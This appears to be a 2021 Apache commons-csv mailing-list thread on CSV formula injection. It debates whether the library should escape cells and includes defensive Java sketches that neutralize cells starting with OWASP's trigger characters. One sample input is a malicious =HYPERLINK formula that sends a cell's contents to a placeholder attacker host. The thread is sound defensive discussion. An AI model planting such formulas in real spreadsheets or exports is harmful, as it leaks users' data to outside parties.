Re: [csv] Does the library provide means to circumvent CSV injection

Matt Seil Thu, 11 Nov 2021 16:11:42 -0800

The TLDR version: OWASP's recommendation is specifically to render code intended to be executed as unexecutable. I'd suggest that a fix be done in the OWASP-Java-Encoder project and not here. I believe that providing this feature, even at OWASP, has near-zero value in the long run, because the purpose of formulas in Excel IS to be executed--and Microsoft already offers the best speed bump. Here be dragons!


cc'ing my partner in crime.


============================

I apologize. This is going to be a TLDR response because I don't know any of you professionally, so I'm erring on the side of completeness. Sincere apologies if I'm stating things you believe to be obvious, or am myself ignorant of something obvious.

So I think there's a misunderstanding in regard to the threat described by the OWASP article. The threat is explicitly *FORMULA* execution in Excel--and LibreOffice. It sounds similar to a browser problem, but it's not; it's far worse. The reason this particular threat tends to be out of bounds in bug bounty programs and CTF contests is that the attack that exploits it is a social engineering attack, which always works in the real world. Hence bug bounties won't pay out for it.


The recommendation from OWASP is as follows:

Encode the following offending characters:

 * Equals to (=)
 * Plus (+)
 * Minus (-)
 * At (@)
 * Tab (0x09)
 * Carriage return (0x0D)
 * The set [;',"], which should be similarly escaped

While this would be a mitigation, it would also *purposefully break any formulas* placed into a CSV cell. This is a critical point, and I'll come back to it later. It's all or nothing.
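To make the all-or-nothing point concrete, here is a minimal Java sketch of the leading-character rule above. The class and method names are hypothetical, and it covers only the leading-character check plus standard CSV double-quote escaping, not the full character set in the list. A legitimate =SUM(A1:A3), a plain negative number such as -42, and a malicious =HYPERLINK(...) all come out as the same kind of inert, quoted text.

```java
/**
 * Hypothetical helper sketching the OWASP-style mitigation described above.
 * If a cell starts with a character that spreadsheet applications treat as
 * the start of a formula, it prepends a single quote, doubles any embedded
 * double quotes, and wraps the whole value in double quotes.
 */
public final class CsvCellNeutralizer {

    // Leading characters from the OWASP list: = + - @ tab carriage-return.
    private static final String FORMULA_TRIGGERS = "=+-@\t\r";

    private CsvCellNeutralizer() {
    }

    /**
     * Turns a formula-like value into a quoted CSV field. Other values are
     * returned unchanged and still need normal CSV quoting by the caller.
     */
    public static String neutralize(String cell) {
        if (cell == null || cell.isEmpty()
                || FORMULA_TRIGGERS.indexOf(cell.charAt(0)) < 0) {
            return cell;
        }
        String escaped = cell.replace("\"", "\"\"");
        return "\"'" + escaped + "\"";
    }

    public static void main(String[] args) {
        String[] cells = {
            "=SUM(A1:A3)",                                              // legitimate formula
            "=HYPERLINK(\"http://attacker.invalid/?d=\"&A1,\"Click\")", // malicious formula
            "-42",                                                      // plain negative number
            "plain text"                                                // left untouched
        };
        for (String cell : cells) {
            System.out.println(neutralize(cell));
        }
    }
}
```

A value returned for a formula-like cell is already a complete, quoted CSV field, so it should be written as-is rather than handed to a CSV writer that quotes fields again, or the quotes end up doubled.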


This is where Phil's comment comes in:

"Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell."

First, let me stress the risk again: the threat isn't masking cell contents, it's the *execution* of normal logic in a malicious way. This is the €1M question: "How do we differentiate corrupting values from valid values?"

Asking this CSV library to do it means it has to take on quite a bit of intelligence. It no longer just has to understand what a CSV format is. It has to answer questions like "What does a corrupt equal sign look like?" And it looks just like a valid equal sign. So to do this right, you have to do lexical analysis and parsing the same way Excel is going to do it, and THEN you have to infer behavior.

Therefore, to determine what corrupt characters look like in data designed to be executed, you are now in the business of interpreting what the Excel formula is doing in order to determine whether or not it's safe. This is the core problem: formulas are bits of *user-supplied code designed to be executed*. If you escape them, you break them. At best, you annoy the hell out of the accountant who was expecting your web app to offer a usable spreadsheet, while adding one more layer of manual intervention on top of the standard warning that MS Office shows whenever you open an Excel file not created on your machine.


So... what can we do about it?  Microsoft already did it:

IMHO there's nothing any intermediary library can do that's any better than this. Web applications designed to take spreadsheets as input are special beasts. The proper security rule of thumb is to always ensure DATA is treated as DATA. But that rule gets *really funky* when that DATA is actually supposed to be executable code. That's your choice: if you don't want it to execute, you have to force it to be data, which deliberately breaks execution.

However, I suspect a few of you will be unhappy with my "do nothing" suggestion and insist that something ought to be done.

I would recommend writing a CSV encoder for the owasp-java-encoder project (https://github.com/OWASP/owasp-java-encoder). The framework is already in place, and it's where I push people if they only need encoding functions.

Why I wouldn't do it here: libraries like this have to be written to the lowest common denominator, meaning CSV projects that don't have Excel as a target. You want security functions to process as close to the business logic as possible, and this is the wrong target for that. Doing it here means not breaking legacy code, which means that, by default, the option will be off (or you follow a deprecation strategy).

Further--and this gets to my original hint about threat models--executing formulas in cells is a *desired function* of Excel and its clones. When developers start breaking spreadsheets, they're going to revert to the legacy behavior, meaning you're really talking about improving the defensive capability of the security-minded developers who can stand up to the finance department. When OWASP tells you "This attack is difficult to mitigate," it isn't just the technical issues involved (which I just outlined); it's social. This is why I'm hesitant to offer up "We'll do it in ESAPI," because I don't see the value-add in the bigger picture. Plus, *this is Microsoft's fault*, and I'm not thrilled about writing code to speed-bump *their* problem, which I feel they've addressed as well as they ever will.
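A minimal Java sketch of what doing this "close to the business logic" could look like, under assumptions not stated in the thread: the exporting application knows which columns hold untrusted, user-supplied text and which hold formulas it generated on purpose, so it neutralizes only the former before handing rows to whatever CSV writer it uses. The class name, method names, and column layout are hypothetical, and no CSV library API is involved.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

/**
 * Hypothetical application-side sanitizer: only columns the business logic
 * marks as untrusted are neutralized; application-generated formulas pass through.
 */
public final class ExportRowSanitizer {

    // Leading characters from the OWASP list: = + - @ tab carriage-return.
    private static final String FORMULA_TRIGGERS = "=+-@\t\r";

    private final Set<Integer> untrustedColumns;

    public ExportRowSanitizer(Set<Integer> untrustedColumns) {
        this.untrustedColumns = Set.copyOf(untrustedColumns);
    }

    /** Returns a copy of the row with only the untrusted columns neutralized. */
    public List<String> sanitize(List<String> row) {
        List<String> out = new ArrayList<>(row.size());
        for (int i = 0; i < row.size(); i++) {
            String cell = row.get(i);
            out.add(untrustedColumns.contains(i) ? neutralize(cell) : cell);
        }
        return out;
    }

    // Prefix a single quote so the value is not treated as a formula.
    // Field quoting/escaping is left to the CSV writer used afterwards.
    private static String neutralize(String cell) {
        if (cell != null && !cell.isEmpty()
                && FORMULA_TRIGGERS.indexOf(cell.charAt(0)) >= 0) {
            return "'" + cell;
        }
        return cell;
    }

    public static void main(String[] args) {
        // Column 0: customer-supplied comment (untrusted).
        // Column 1: total the application itself writes as a formula (trusted).
        ExportRowSanitizer sanitizer = new ExportRowSanitizer(Set.of(0));
        List<String> row = List.of(
            "=HYPERLINK(\"http://attacker.invalid\",\"Click\")",
            "=SUM(C2:C9)");
        System.out.println(sanitizer.sanitize(row));
    }
}
```

The point of the design is that the decision lives with the code that knows what each column means; a generic CSV library only sees strings and cannot tell column 0 from column 1. Because only a leading single quote is added here, the CSV writer's normal quoting still applies without double escaping.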




On 11/11/2021 4:36 AM, P. Ottlinger wrote:

Hi guys,

thanks for your reply.

Maybe I'm misinterpreting something but I thought that it could be made
possible to configure CSVFormat-object when writing the CSV data in a
way that any data with possibly corrupting values (as shown on the OWASP
page) will mask the whole contents of the cell.

Thus a library such as commons-csv would be able to lower the risk for
CSV injection and not every client/customer would have to manually
create this protecting logic.

To my mind it's a simple parser for "dangerous" tokens that quotes the
given data with additional " .... as we do not need to write
functioning Excel formulas into CSV.

WDYT?

Cheers,
Phil

On 10.11.21 at 20:53, Gary Gregory wrote:

I agree with Matt. CSV is just a container, it doesn't know or care what
the concept of a "formula" is.

Gary
